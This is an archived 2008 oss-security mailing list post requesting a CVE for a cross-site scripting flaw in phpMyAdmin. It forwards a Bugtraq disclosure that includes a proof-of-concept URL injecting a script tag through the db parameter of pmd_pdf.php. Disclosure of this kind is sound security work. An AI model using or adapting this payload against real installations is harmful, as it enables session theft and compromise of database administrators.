oss-sec mailing list archives
CVE request phpmyadmin (Fwd: XSS in phpMyadmin)
From: Hanno Böck <hanno () hboeck de>
Date: Tue, 28 Oct 2008 00:28:59 +0200
No fix yet, works also in 3.0.1. ---------- Weitergeleitete Nachricht ---------- Subject: XSS in phpMyadmin Date: Montag 27 Oktober 2008 From: hadikiamarsi () hotmail com To: bugtraq () securityfocus com Author : Hadi Kiamarsi ------------------------------------------- Discovered by : Hadi Kiamarsi ------------------------------------------- Exploited By : Hadi Kiamarsi ------------------------------------------- E-Mail : hadikiamarsi[at]hotmail.com ------------------------------------------- web site : www.ircrash.com ------------------------------------------- members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr ------------------------------------------- Sript Name : phpmyadmin ( All version ) Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download ------------------------------------------- XSS Exploit : register_globals=on query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script> ------------------------------------------------------- -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail: hanno () hboeck de http://x1000malquer.de/ - ab 8.11. Atomtransporte stoppen
Attachment:
signature.asc
Description: This is a digitally signed message part.
Current thread:
- CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Hanno Böck (Oct 27)
- Re: CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Thijs Kinkhorst (Oct 28)
- Re: CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Hanno Böck (Oct 28)
- Re: CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Steven M. Christey (Oct 28)
- Re: CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Hanno Böck (Oct 29)
- Re: CVE request phpmyadmin (Fwd: XSS in phpMyadmin) Thijs Kinkhorst (Oct 28)